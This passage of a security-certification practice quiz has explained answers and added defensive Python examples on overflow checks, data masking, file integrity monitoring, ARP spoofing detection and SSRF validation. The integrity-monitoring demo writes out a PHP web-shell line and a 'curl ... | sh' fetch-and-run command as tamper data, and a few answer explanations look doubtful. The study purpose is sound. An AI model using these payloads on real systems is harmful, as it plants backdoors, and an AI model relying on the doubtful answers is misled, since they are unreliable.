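    return wrap_int32(count * element_size)


def checked_buffer_size(count: int, element_size: int) -> int:
    """Hardened pattern: reject inputs whose product cannot be represented."""
    if count < 0 or element_size <= 0:
        raise ValueError("count must be >= 0 and element_size > 0")
    total = count * element_size
    if not fits_int32(total):
        raise OverflowError(f"{count} * {element_size} does not fit in a 32-bit int")
    return total


if __name__ == "__main__":
    # Constructed attacker-controlled length fields.
    print("INT32_MAX + 1 wraps to", wrap_int32(INT32_MAX + 1))            # -2147483648
    print("0x40000000 * 4 wraps to", unchecked_buffer_size(0x40000000, 4))  # 0
    print("0x20000001 * 8 wraps to", unchecked_buffer_size(0x20000001, 8))  # 8
    try:
        checked_buffer_size(0x40000000, 4)
    except OverflowError as exc:
        print("checked version rejected it:", exc)
```

In C the equivalent check is `__builtin_mul_overflow(count, size, &total)` or an explicit `count > INT_MAX / size` test before the multiplication; the check must happen on the inputs, because once the product has wrapped the bad value is indistinguishable from a legitimate small one.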

An attacker came within close proximity of a victim and sent the mobile device user spam of an unsolicited text message. Once the user clicked the link in the message, Trojan malware infected the user's device. What type of attack did the hacker most likely infect the mobile user with? -Bluesnarfing -Skimming -WiPhishing -Bluejacking

-Bluejacking (A Bluetooth-discoverable device is vulnerable to bluejacking, similar to spam, where someone sends an unsolicited text (or picture/video) message or vCard (contact details). This can also be a vector for Trojan malware.)

A network engineer is plugging in new patch cables and wants to prevent inadvertent disruptions to the network while doing so. What will the engineer prevent if a Spanning Tree Protocol (STP) is configured on the switches? -MAC floods -Broadcast storms -DHCP spoofing -Signature-based intrusion

-Broadcast storms (Spanning Tree Protocol (STP) lets switches (bridges) organize themselves into a loop-free tree by blocking redundant links. Without it, a patch cable that creates a loop lets broadcast frames circulate and be re-flooded indefinitely, creating a broadcast storm.)

Which control types does a systems engineer implement when an initial locking mechanism does not perform as expected? (Select all that apply.) -Detective -Compensating -Preventative -Corrective

-Compensating (A compensating control serves as a substitute for a principal control, as recommended by a security standard, and affords the same (or better) level of protection.) -Preventative (A preventive control acts to eliminate or reduce the likelihood that an attack can succeed. It operates before an attack can take place. An example of this control type is a lock.)

An IT company purchases a commercial off the shelf (COTS) product that allows for four developers to access and run the product against developed code for vulnerability and threat assessments. An IT audit indicates that five developers have accessed the product. Which of the following best describes what the company is in violation of? -Vendor diversity -Terms of agreement -Regulatory framework -Compliance/Licensing

-Compliance/Licensing (Software compliance and licensing is a legally binding agreement that means using software only in accordance with the developer's conditions of use, such as the number of permitted users.)

Which principle of social engineering can a threat actor use to get many people to act as others would? -Consensus -Trust -Scarcity -Liking

-Consensus (The principle of consensus or social proof refers to techniques that cause many people to act just as others would without force. The attacker can use this instinct to persuade the target that to refuse a request would be odd.)

A company implements automated tools and processes to increase the visibility and transparency of network activity to mitigate the risk of cyber-attacks and detect application performance issues. Which of the following did the company implement? -Continuous integration -Continuous monitoring -Continuous deployment -Continuous delivery

-Continuous monitoring (Continuous monitoring is the process used to detect compliance and risk issues associated with an organization in real-time. Continuous monitoring allows an organization the ability to react to issues swiftly.)

Which classification of data is likely to be immediately escalated in the case of a breach? -Personally identifiable information (PII) -Non-PII customer data -Public data -Critical data

-Critical data (Critical data, sometimes top-secret, is too valuable to permit any risk of a breach. Therefore, any detected abnormality should immediately be escalated to senior decision-makers.)

A database export allows personally identifiable information (PII) to display in report format and on screen. This poses a potential data leakage concern. In order to protect this PII, what de-identification method should the programmer consider implementing? -Hashing -Data masking -Tokenization -Salting

-Data masking (Data masking is a secure coding technique used to hide sensitive or private data from disclosure. All or part of each data field is altered by replacing characters with a mask character, such as x, so the report shows the format of the value without the value itself.)
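
The following is an added example (written for this page, not part of the quiz) of a masking layer that a programmer could place between the database export and the report or screen. The sample row, field names and rule table are constructed; the point is that masking is driven by an explicit per-field rule set and preserves the shape of each value.

```python
import re

MASK_CHAR = "X"
SSN_PATTERN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
CARD_PATTERN = re.compile(r"\b(?:\d{4}[ -]){3}\d{4}\b")


def mask_identifier(value: str, keep_last: int = 4) -> str:
    """Mask every digit except the trailing `keep_last`, preserving separators
    so the masked value still reads like the original field (SSN, card, phone)."""
    digit_positions = [i for i, ch in enumerate(value) if ch.isdigit()]
    masked = set(digit_positions[:-keep_last] if keep_last else digit_positions)
    return "".join(MASK_CHAR if i in masked else ch for i, ch in enumerate(value))


def mask_email(address: str) -> str:
    """Keep the first character of the local part and the whole domain."""
    local, at, domain = address.partition("@")
    if not at:
        return MASK_CHAR * len(address)
    return local[:1] + MASK_CHAR * (len(local) - 1) + "@" + domain


def mask_free_text(text: str) -> str:
    """Catch identifiers that leaked into notes or comment fields."""
    text = SSN_PATTERN.sub(lambda m: mask_identifier(m.group(0)), text)
    return CARD_PATTERN.sub(lambda m: mask_identifier(m.group(0)), text)


# Field -> masking function. Fields not listed pass through unchanged, which is
# deliberate: this table is where a reviewer looks to see what is protected.
MASKING_RULES = {
    "ssn": mask_identifier,
    "card_number": mask_identifier,
    "phone": mask_identifier,
    "email": mask_email,
    "notes": mask_free_text,
}


def mask_record(record: dict, rules: dict = MASKING_RULES) -> dict:
    """Return a masked copy of one exported row; the original is left untouched."""
    return {field: rules[field](value) if field in rules and isinstance(value, str) else value
            for field, value in record.items()}


# Constructed sample row standing in for one line of the database export.
SAMPLE_ROW = {
    "customer_id": 10442,
    "name": "Jane Doe",
    "ssn": "123-45-6789",
    "card_number": "4111 1111 1111 1234",
    "phone": "+1 (555) 867-5309",
    "email": "jane.doe@example.com",
    "notes": "Caller confirmed SSN 123-45-6789 over the phone",
}

if __name__ == "__main__":
    for field, value in mask_record(SAMPLE_ROW).items():
        print(f"{field:12s} {value}")
```

Masking is irreversible by design, which is what distinguishes it from tokenization (reversible through a vault) and from hashing (deterministic, so a hashed SSN can still be matched against a list of guesses); the free-text rule matters because identifiers copied into comment fields are the ones most exports forget.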

What does the process of carving refer to? -Strategic counterintelligence -Non-repudiation -Acquiring evidence according to order of volatility -Data recovery

-Data recovery (Carving refers to analyzing a disk (or a disk image) for file fragments retained in slack or unallocated space, identifying them by content signatures such as file headers rather than by file system metadata. These fragments may represent deleted or overwritten files.)

What is it known as when a particular jurisdiction prevents or restricts processing and storage from taking place on systems that do not physically reside within that jurisdiction? -Data sovereignty -E-discovery -Provenance -Preservation

-Data sovereignty (Data sovereignty refers to a jurisdiction that prohibits or limits the processing, storage, and retrieval of data that do not geographically fall under that jurisdiction.)

The IT team has purchased a few devices that are compatible with the Trusted Computing Group Security Subsystem Class called Opal. Which of these device specifications will take advantage of Opal's security features? -Automatic vendor updates -Operating system -Disk encryption -Registry settings

-Disk encryption (The Opal security subsystem class is a set of specifications that defines a management interface for a host application to activate, provision, and manage encryption of user data on self-encrypting drives (SED).)

What is the main difference between a disk image and a snapshot? -Snapshots are complete copies. -Snapshots are Windows exclusive. -Disk images include bootloader and OS. -Disk images can only be captured with Linux.

-Disk images include bootloader and OS. (A disk image is a digital file accurately representing the contents and configuration of a disk volume or a whole data storage unit. A disk image includes a bootloader and operating system (OS).)

The 802.1x framework establishes several ways for devices and users to be securely authenticated before they are permitted access to LAN (Local Area Network) or WLAN (Wireless LAN). Identify the actual authentication mechanism established. -WPA -AES -RSA -EAP

-EAP (802.1x, which is the Port-based Network Access Control framework, establishes several ways for devices and users to be securely authenticated before they are permitted full network access. EAP or extensible authentication protocol is the actual authentication mechanism.)

A website uses a code generator for access to the site. Once a user enters their username, a one-time 30-second code is generated and provided through a stand-alone app. The user must enter the unique code to gain access. This is an example of which of the following cryptography methods? -Entropy -ECC -Block chain -Ephemeral

-Ephemeral (An ephemeral key is a cryptographic key generated for a single execution of a key establishment process and then discarded. In a time-based one-time password scheme the shared secret held by the user's authenticator app and the authentication server is combined with a counter derived from the current time (here a 30-second step) to produce a code that is valid only for that interval.)

A foreign country is planning to target another country to destabilize its economy and upcoming elections. A hacktivist group and government leaders are working together using hybrid warfare tactics to accomplish their goal. What are the most effective methods the foreign country can use to carry out their plan? (Select all that apply.) -Fake tweets -Espionage -Dumpster diving -Soft power

-Fake tweets (Using fake news or hoaxes on social media can mislead citizens of the target country very quickly. This can promote hysteria and even dangerous protesting campaigns on the ground.) -Espionage (Hybrid warfare involves espionage and other hacking and social engineering techniques to launch a hostile campaign against another country. Espionage is the practice of spying on another country.) -Soft power (Soft power refers to using diplomatic and cultural assets to achieve an objective. This can influence the operations of companies and or organizations in the target country to assist with hybrid warfare.)

A hacker modified a company photo by embedding malicious code in the picture. The hacker emailed the picture to company employees, and several employees opened the email. The hacker now has remote access to those employees' computers. Which of the following can prevent this method of attack? -File integrity monitoring -Protocol analyzer -File encryption -Steganography

-File integrity monitoring (File integrity monitoring is a feature available in most antivirus software or host-based intrusion prevention systems (HIPS). The tool records a baseline hash of each monitored file; when a file such as the company photo is altered, its hash no longer matches the baseline, so the change is flagged and the file can be quarantined.)
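
To show what the baseline-and-compare step actually involves, here is an added example written for this page (not the quiz's or any product's code). It builds a SHA-256 baseline over a constructed directory tree, then tampers with it the way the question describes (code appended to an image), adds a file and removes one, and reports the differences.

```python
import hashlib
import os
import tempfile


def file_digest(path: str) -> str:
    """SHA-256 of a file, read in chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict:
    """Hash every file under root, keyed by path relative to root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            baseline[os.path.relpath(full, root)] = file_digest(full)
    return baseline


def compare_to_baseline(baseline: dict, root: str) -> dict:
    """Rescan root and report files whose hash changed, appeared, or vanished."""
    current = build_baseline(root)
    return {
        "modified": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo() -> dict:
    """Baseline a constructed tree, tamper with it, and return the comparison."""
    with tempfile.TemporaryDirectory() as root:
        files = {
            "logo.png": b"\x89PNG\r\n\x1a\n(constructed image bytes)",
            "README.txt": b"company photo archive\n",
            os.path.join("bin", "viewer"): b"#!/bin/sh\nexec display \"$1\"\n",
        }
        for rel, data in files.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
        baseline = build_baseline(root)

        # Tampering, as in the question: malicious payload appended to the picture.
        with open(os.path.join(root, "logo.png"), "ab") as fh:
            fh.write(b"<?php system($_GET['c']); ?>")
        with open(os.path.join(root, "bin", "updater"), "wb") as fh:
            fh.write(b"#!/bin/sh\ncurl http://198.51.100.7/x | sh\n")  # constructed, RFC 5737 address
        os.remove(os.path.join(root, "README.txt"))

        return compare_to_baseline(baseline, root)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9s} {paths}")
```

The baseline is only as trustworthy as its storage: an attacker who can modify the files can usually modify a baseline kept beside them, so real FIM tools sign the baseline or keep it off the host, and they hash at a cadence short enough that a change is caught before the altered file is executed again.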

A basic installation of a web server will require which of the following to allow unauthenticated access? -Guest account -Shared account -Service account -User account

-Guest account (A guest account is a special type of shared account with no password. It allows anonymous and unauthenticated access to a resource. Guest accounts are created when installing web services, as most web servers allow unauthenticated access.)

Which value is the result of a quantitative or qualitative risk analysis? -Inherent risk -Single loss expectancy -Annualized loss expectancy -Risk factors

-Inherent risk (The result of quantitative or qualitative analysis is a measure of inherent risk. Inherent risk is the level of risk before any type of mitigation has been attempted.)

Describe an intrusion prevention system (IPS) that also makes it a single point of failure for network traffic if there is no fault tolerance mechanism in place. -Heuristic appliance -Passive appliance -Anomaly appliance -Inline appliance

-Inline appliance (Intrusion prevention system (IPS) appliances that must have all traffic pass through them are "inline" with the network. This also makes them a single point of failure if there is no fault tolerance mechanism in place.)

Which of the following, if implemented, will NOT help mitigate the threat of tailgating? -Installing non-discretionary privilege management -Installing a mantrap -Installing surveillance cameras -Installing a turnstile

-Installing non-discretionary privilege management (Nondiscretionary privilege management models are aimed to mitigate the problem of regulating the access control of privileged admin accounts.)

Which of the following baseband radio technologies support higher bandwidth capacities? -FPGA -LTE-M -Narrowband -Zigbee

-LTE-M (LTE Machine Type Communication (LTE-M) allows Internet of Things (IoT) devices to connect directly to a 4G network, without a gateway. It is a baseband radio technology that supports higher bandwidths.)

When implementing a native-cloud firewall, which layer of the Open Systems Interconnection (OSI) model will require the most processing capacity to filter traffic based on content? -Layer 1 -Layer 7 -Layer 4 -Layer 3

-Layer 7 (At layer 7, or the application layer of the OSI model, the firewall can parse application protocol headers and payloads (such as HTTP packets) and make filtering decisions based on their contents. This requires the most processing capacity (or load balancing), or the firewall will become a bottleneck causing network latency.)

The ARP cache stores what kind of information about recent connections? -Packet data -Round trip time (RTT) of network hops -Latency and packet loss stats -MAC addresses

-MAC addresses (The ARP cache holds the MAC address of the interface corresponding to each IP address the local host has recently communicated with. An unexpected change to a cached entry, or one MAC address answering for several IP addresses, can indicate an ARP-based Man-in-the-Middle or other spoofing attack.)

Which type of network attack involves asserting the use of an arbitrary hardware address onto a network interface card (NIC)? -URL redirection -MAC cloning -ARP poisoning -MAC flooding

-MAC cloning (Media access control (MAC) cloning, or MAC address spoofing, changes the hardware address configured on an adapter interface or asserts the use of an arbitrary MAC address.)
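
The two answers above describe the same detection from opposite sides: the ARP cache is where a cloned or spoofed MAC address shows up on the victim. The following added example (written for this page, not from the quiz) parses the text output of `arp -n`, `arp -a` or `ip neigh` and flags the two symptoms of an ARP poisoning or MAC cloning attempt. The two snapshots are constructed; in the second one the host at 192.168.1.77 has asserted the gateway's IP address.

```python
import re

# One IPv4 entry per line in Linux `arp -n`, Windows `arp -a` and `ip neigh` output.
ARP_LINE = re.compile(
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s.*?(?P<mac>(?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def normalize_mac(mac: str) -> str:
    return mac.lower().replace("-", ":")


def parse_arp_table(text: str) -> dict:
    """Map each IPv4 address in the table to its cached MAC address."""
    table = {}
    for line in text.splitlines():
        match = ARP_LINE.search(line)
        if match:
            table[match.group("ip")] = normalize_mac(match.group("mac"))
    return table


def duplicate_macs(table: dict) -> dict:
    """MAC addresses that answer for more than one IP address (a poisoned
    gateway entry typically shares the attacker's own MAC)."""
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def changed_entries(baseline: dict, current: dict) -> list:
    """Entries whose MAC differs from a trusted earlier snapshot: (ip, old, new)."""
    return sorted((ip, baseline[ip], current[ip])
                  for ip in baseline if ip in current and baseline[ip] != current[ip])


# Constructed snapshots in Linux `arp -n` format.
BASELINE_ARP = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   00:11:22:33:44:55   C                     eth0
192.168.1.20             ether   aa:bb:cc:dd:ee:01   C                     eth0
192.168.1.77             ether   de:ad:be:ef:00:77   C                     eth0
"""
CURRENT_ARP = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.1.1              ether   de:ad:be:ef:00:77   C                     eth0
192.168.1.20             ether   aa:bb:cc:dd:ee:01   C                     eth0
192.168.1.77             ether   de:ad:be:ef:00:77   C                     eth0
"""

if __name__ == "__main__":
    before, after = parse_arp_table(BASELINE_ARP), parse_arp_table(CURRENT_ARP)
    print("changed:", changed_entries(before, after))
    print("one MAC, many IPs:", duplicate_macs(after))
```

A duplicate MAC is not proof on its own (a router doing proxy ARP legitimately answers for several addresses), so the change against a trusted baseline, especially for the default gateway, is the stronger signal; static ARP entries for the gateway or Dynamic ARP Inspection on the switch are the preventive counterparts.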

An engineer configures a security control that oversees and monitors other controls for effectiveness. Which category of control does the engineer utilize? -Managerial -Operational -Technical -Availability

-Managerial (A managerial control gives oversight of an information system. Examples could include risk identification or a tool allowing the evaluation and selection of other security controls.)

A multinational company has partnered with several smaller, younger companies. To protect their supply chain and improve their own risk posture, the company offers to provide network security services for their new partners. Conclude what type of risk the company is addressing. -External -Multiparty -Legacy systems -Internal

-Multiparty (Multiparty risk occurs when an adverse event impacts multiple organizations. If a breach occurs for one party, all parties share the risk.)

A network administrator is installing a device that uses redundant array of inexpensive disks (RAID) technologies for redundancy and provides employees remote access so that files can be accessed anywhere. The device does not require licensing and stores data at the file level. Which device is the employee likely installing in the infrastructure? -RDP -NAS -VDI -SAN

-NAS (Network-attached storage (NAS) is a file-level data storage server attached to a network that provides data access to a common group of clients. NAS is a single storage device that serves files over Ethernet. NAS can be accessed remotely and uses RAID to tolerate hard drive failure.)

The company's current network utilizes EAP-TTLS (EAP-Tunneled TLS) for supplicant clients connecting to the network. Newer model devices and systems are deployed on the network and are not compatible with EAP-TTLS. These systems require MS-CHAPv2 for authentication. Which of the following options will support these new systems? -EAP-MD5 -PEAP -LEAP -EAP-FAST

-PEAP (PEAPv0 (also known as EAP-MSCHAPv2) carries MS-CHAPv2 inside the TLS tunnel. Where required, PEAPv1 (also known as EAP-GTC), a Cisco variant, can be used instead.)

An application user receives an automated message after an attempt to login to a company application to verify activity. Which form of two-factor authentication is this? -SMS -Push notification -Phone call -Voice recognition

-Phone call (A phone call is a form of two-factor authentication (2FA). An automated service dials the registered number on file to confirm authentication of a user.)

Describe the general function of the command echo "head" when used in conjunction with a resource pointer, such as a filename or IP address. -Generates a log file -Identifies vulnerabilities -Prints a web resource header -Prints the first lines of the target

-Prints the first lines of the target (The head command outputs the first ten lines of its input by default; head -n 5 file shows five. When the input is a resource such as a log file or a fetched page, it prints the beginning of that target.)

Identify the most volatile form of memory. -Hard disk -Random Access Memory (RAM) -Pagefile -Cache

-Random Access Memory (RAM) (System memory is volatile data contained in Random Access Memory (RAM) modules. Since RAM requires power in order to retain data, the contents of RAM disappear when power is turned off.)

Which team performs the offensive role in a penetration exercise? -Purple team -Red team -Blue team -White team

-Red team (The red team performs the offensive role to try to infiltrate the target. This team is one of two competing teams in a penetration testing exercise.)

A capability delivery manager adds a configuration management plan, a failover plan, and a risk assessment to a program's documentation inventory. Which of the following best describes what controls the manager is addressing? -Response and recovery -Technical -Operational -Change management

-Response and recovery (Response and recovery controls are a variety of policies, procedures, and resources defined to guide an entity in responding to an outage/disaster and the steps taken to recover from an outage/disaster.)

A configuration manager creates policies and procedures for events such as power failure, network intrusion, and denial of service. These documents include step-by-step instructions to protect the application and restore it to a functional state within a certain timeframe. What has the configuration manager implemented? -Response and recovery control -Control diversity -Technical control -Operational security control

-Response and recovery control (Response and recovery controls include all policies, procedures, and resources developed for incident and disaster response and recovery. These can include a configuration management plan, disaster recovery plan, and an incident response plan.)

Sometimes data is archived after it is past its usefulness for purposes of security or regulatory compliance. What is this called? -Correlation -Sensitivity -Retention -Trends

-Retention (When policy dictates preserving data in an archive after the date it is still being used, whether for regulatory or security purposes, this is known as a retention policy.)

After reading an article online, a business stakeholder is concerned about a risk associated with Denial of Service (DoS) attacks. The stakeholder requests information about what countermeasures would be taken during an attack. Where would the security analyst look to find this information? -Risk and Control Assessment -Risk heat map -Risk register -Risk regulations

-Risk register (The risk register shows the results of risk assessments in a comprehensible document format. Information in the register includes impact, likelihood ratings, date of identification, description, countermeasures, owner/route for escalation, and status.)

An employee can conduct meetings using a corporate owned personally enabled mobile (COPE) device while on a company related work trip. The service for the device is provided by Verizon Wireless. What component of the device authenticates the device to the provider? -Implied trust -SIM -Context aware -Token key

-SIM (A subscriber identity module (SIM) card is used to identify and authenticate subscribers on mobile and cellular devices. The SIM is issued by a cellular provider with roaming to allow use of other suppliers' tower relays.)

How does the General Data Protection Regulations (GDPR) classify data that can prejudice decisions, such as sexual orientation? -Private -Proprietary -Confidential -Sensitive

-Sensitive (The sensitive classification is used in the context of personal data about a subject that could harm them if made public and could prejudice decisions made about them if referred to by internal procedures.)

How can an attacker exploit the lack of authentication between the internal services (e.g., implicit trust) of a web host to steal service account credentials? -Memory leak -Session replay -Cross-site scripting -Server-side request forgery

-Server-side request forgery (Server-side request forgery (SSRF) exploits both the lack of authentication between the internal servers and services (implicit trust) and weak input validation, allowing the attacker to submit unsanitized requests or Application Programming Interface (API) parameters.)
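
Because the internal services trust any request arriving from the web host, the defence has to sit where the host decides what to fetch. The following added example (written for this page, not the quiz's or any framework's code) validates a user-supplied URL by the addresses it would actually connect to, rejecting loopback, private, link-local and cloud-metadata ranges. The resolver used in the demonstration is a constructed lookup table so the code runs offline; the `system_resolver` path uses the real `socket.getaddrinfo`.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges an outbound fetch made on a user's behalf must never reach.
# ipaddress's is_private covers most of these; shared address space
# (100.64/10) and the link-local metadata range are listed explicitly.
DENIED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]


def is_denied_address(address: str) -> bool:
    addr = ipaddress.ip_address(address)
    # IPv4-mapped IPv6 (::ffff:127.0.0.1) must be judged as the embedded IPv4 address.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    if (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified):
        return True
    return any(addr in net for net in DENIED_NETWORKS)


def system_resolver(host: str) -> set:
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def resolve_target(url: str, resolver=system_resolver, schemes=("http", "https")):
    """Return the set of addresses the fetch would contact, or None if not allowed.

    Deciding on resolved addresses rather than on the host string defeats
    obfuscated literals (0x7f000001, 2130706433, 127.1) and DNS names that
    point inside the network.
    """
    parts = urlsplit(url)
    if parts.scheme not in schemes or not parts.hostname:
        return None
    if parts.username is not None or parts.password is not None:
        return None  # http://trusted.example@10.0.0.5/ fools checks that look at the first host
    host = parts.hostname
    try:
        addresses = {str(ipaddress.ip_address(host))}
    except ValueError:
        try:
            addresses = set(resolver(host))
        except (socket.gaierror, KeyError, OSError):
            return None
    if not addresses or any(is_denied_address(a) for a in addresses):
        return None  # every answer must be external, or a mixed answer set gets through
    return addresses


def is_safe_url(url: str, resolver=system_resolver) -> bool:
    return resolve_target(url, resolver) is not None


# Constructed DNS answers for the offline demonstration (hypothetical names).
FAKE_DNS = {
    "example.com": {"93.184.216.34"},
    "intranet.corp": {"10.20.30.40"},
    "rebinder.evil": {"93.184.216.34", "127.0.0.1"},
}


def fake_resolver(host: str) -> set:
    return FAKE_DNS[host]


if __name__ == "__main__":
    for url in ("http://example.com/report", "http://intranet.corp/admin",
                "http://169.254.169.254/latest/meta-data/", "http://[::ffff:127.0.0.1]/",
                "http://rebinder.evil/", "file:///etc/passwd", "http://example.com@10.20.30.40/"):
        print(f"{'allow' if is_safe_url(url, fake_resolver) else 'deny ':5s} {url}")
```

The check is only half the fix: the fetch must connect to the address that was validated (pin it, rather than resolving the name a second time, or a rebinding DNS server answers differently on the second lookup), and every redirect the target returns has to go through the same validation.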

A cloud service provider (CSP) offers an organization the ability to build and run applications and services without having to manage infrastructure such as provisioning, authentication, and server maintenance. This offering reduces overhead and allows the organization to focus on the product being built. What type of design pattern is this? -Software defined network -Microservice architecture -Serverless architecture -Service oriented architecture

-Serverless architecture (A serverless architecture is a cloud model where applications are hosted by a third-party provider. A serverless architecture removes the responsibility of the consumer to provision, scale, and maintain server and storage solutions by applying functions and microservices.)

A water company has replaced outdated equipment with units that can record and report water consumption from a consumer's home to the office. This eliminates the need to send a technician out monthly to read the equipment. What has the company invested in? -Embedded system -VoIP -RTOS -Smart meter

-Smart meter (A smart meter is an electronic device that records information and communicates the information to the consumer remotely. Smart meters can electronically transmit data on utility use on a predetermined time basis, rather than a company sending out an employee and relying on an estimate.)

A security engineer for a tech firm tests authentication mechanisms for multi-factor authentication. Which personality trait-based solution does the engineer test? -Something you know -Something you exhibit -Something you can do -Something you are

-Something you exhibit (Something you exhibit refers to behavioral-based authentication and authorization, with specific emphasis on personality traits.)

A user receives multiple emails daily from various vendors and companies. The emails seem legitimate but are overly excessive. What is the user most likely receiving? -Spam advertisements -SPIM threats -SMiShing texts -Vishing messages

-Spam advertisements (Spam or unsolicited messages via email are sent in bulk to users for advertisements or to deliver malware.)

Having some information already about the target user, an attacker would most likely carry out which of the following to scam the user? -Shoulder surfing -Spear phishing -Tailgating -Dumpster diving

-Spear phishing (Spear phishing is a scam where the attacker has some information that makes an individual target more likely to be fooled by the attack.)

Which aspect of certificate and key management should an administrator consider when trying to mitigate or prevent the loss of private keys? -Storage -Revocation -Expiration -OCSP

-Storage (Private keys or certificates must be securely stored to prevent unauthorized use and loss. The certificate authority that creates the key pair must provide strict access control to the database and maybe even data-at-rest encryption.)

Analyze the active defense solution statements and determine which best describes the purpose of a honeyfile. -The attempts to reuse can be traced if the threat actor successfully exfiltrates it. -A decoy is set as a distraction to emulate a false topology and security zones. -Configurations are in place to route suspect traffic to a different network. -It is helpful in analyzing attack strategies and may provide early warnings of attacks.

-The attempts to reuse can be traced if the threat actor successfully exfiltrates it. (A honeyfile is convincingly useful but actually fake data. This data can be made trackable, so that when a threat actor successfully exfiltrates it, the attempts to reuse or exploit it can be traced.)

Users are only allowed to work in the office, and account policies must provide login security measures, so users only work during normal business hours. Identify the policy that establishes the maximum amount of time an account may be logged in for at the workplace. -Time of day policy -Impossible travel policy -Location-based policy -Time-based login policy

-Time-based login policy (A time-based login policy establishes the maximum amount of time an account may be logged in for. For example, a user with no activity will be logged off after 6 hours.)

A network administrator needs a service to easily manage Virtual Private Cloud (VPC) and edge connections. The service must have a central console for ease of monitoring all components. Which of the following is the best solution for the administrator to use in a cloud computing environment? -Cloud storage gateway -Transit gateway -Gateway endpoint -NAT gateway

-Transit gateway (A transit gateway is a cloud network hub that allows users to interconnect virtual private clouds (VPC) and on-premises networks through a central console.)

Flow analysis tools, such as IPFIX or NetFlow, collect metadata about network traffic without capturing each frame. Evaluate the type of analysis that uses these tools. -Log analysis -Trend analysis -Vulnerability analysis -Packet analysis

-Trend analysis (Since flow analyzers gather metadata and statistics about network traffic, they are commonly used to visualize traffic statistics in order to assist in identifying trends.)

A threat actor logs in to a website as a free user and submits a request for a file. The request references the parent directory of the web server. This injection attack is successful by using a canonicalization attack to disguise the nature of the malicious input. How was the threat actor able to retrieve the file? -Using an LDAP injection attack -Using a DLL injection attack -Using a directory traversal attack -Using an XML injection attack

-Using a directory traversal attack. (A directory traversal attack is an injection attack that uses specific code to request information from a web server's root directory by submitting the directory path.)

The intelligence community requires tight security of classified data stored on the local servers. The area must be inaccessible to unauthorized personnel and able to withstand a blast from explosives. Which of the following is the best solution for securing the assets? -PDS -Vault -DMZ -Air gap

-Vault (A vault is an isolated area that houses critical resources. Vaults use extreme measures to protect access and can typically withstand a major destructive event. A safe is also secure, and considered a smaller alternative to a vault.)

Where should a systems administrator search for more information on how to fix a CPU vulnerability on a Dell rack server? -Facebook -Best Buy Geek Squad -Black Hat conference -Vendor support page

-Vendor support page (Vendors will provide guides, templates, and tools for configuring and securing operating systems, applications, and physical devices like a rack server. CPU vulnerabilities may require firmware updates that may only be available from the vendor.)

A representative at a company reports that they receive unsolicited phone calls seeking banking information for a credit report. Which social engineering variant is the finance director experiencing? -Spear phishing -Whaling -Vishing -Smishing

-Vishing (Vishing is a phishing attack conducted through a voice channel (telephone or VoIP, for instance). Targets could be called by someone purporting to represent their bank or some other official institution.)

Which of the following represents a non-intrusive scanning type of framework? -An exploitation framework -Metasploit -Penetration testing -Vulnerability scanning

-Vulnerability scanning (Whether they use purely passive techniques or some sort of active session or agent, vulnerability scanners represent a non-intrusive scanning type. The scanner identifies vulnerabilities from its database by analyzing things such as build and patch levels or system policies.)

A brute-force attack compromises a server in a company's data center. Security experts investigate the attack type and discover which vulnerability on the server? -Default settings -Unsecure protocols -Open ports and services -Weak encryption

-Weak encryption (Weak encryption vulnerabilities allow unauthorized access to data. An algorithm used for encryption may have known weaknesses that allow brute-force enumeration.)

A cloud service provider (CSP) offers email capability, remote desktop access, and virtual class software to its consumers. Which cloud service model does this best represent? -IaaS -XaaS -PaaS -Hybrid

-XaaS (Anything as a Service (XaaS) is a cloud model that offers a multitude of services over the internet. These can include, but are not limited to, remote desktop protocol (RDP), email services, and pre-configured software. XaaS is a mix and match of cloud services.)

An IT hobbyist builds a script in Python to scrape web pages for images. Recommend a command-line tool the hobbyist can use in the script to download the image files to a local drive. -cat -grep -curl -chmod

-curl (Curl is a command-line tool to transfer data to or from a server using supported protocols, such as HTTP, FTP, or IMAP. It is commonly used in web scrapers or for downloading files from the web to local storage.)

A security administrator notices port scanning from an unknown entity on the company infrastructure. The administrator sets up a router to return erroneous information to the scanner to protect the system from breach or attack. What is the router providing in response to the scan? -Fake telemetry -DNS sinkhole -HIDS -Honeyfile

-Fake telemetry

Analyze and select the items demonstrating advantages Terminal Access Controller Access-Control System Plus (TACACS+) has over Remote Authentication Dial-In User Service (RADIUS). (Select all that apply.) [] It allows detailed management of privileges assigned to users. [] It only encrypts authentication data. [] It provides greater flexibility and reliability. [] It is easier to detect when a server is down.

[] It provides greater flexibility and reliability. (TACACS+ is similar to RADIUS but Cisco designed it with flexibility in mind. Its connection-oriented delivery method increases reliability and flexibility. It is supported by third parties and open-source RADIUS implementations.) [] It is easier to detect when a server is down. (TACACS+ uses TCP communications for reliable, connection-oriented delivery, making it easier to detect when a server is down.)

A network with two normally working switches has several client computers connected for work and Internet access. After adding two new switches and more client computers, the new computers, as well as some of the old client computers, cannot access the network. What are most likely the cause and the solution? (Select all that apply.) []Flood guard []Port security []A loop in the network []STP

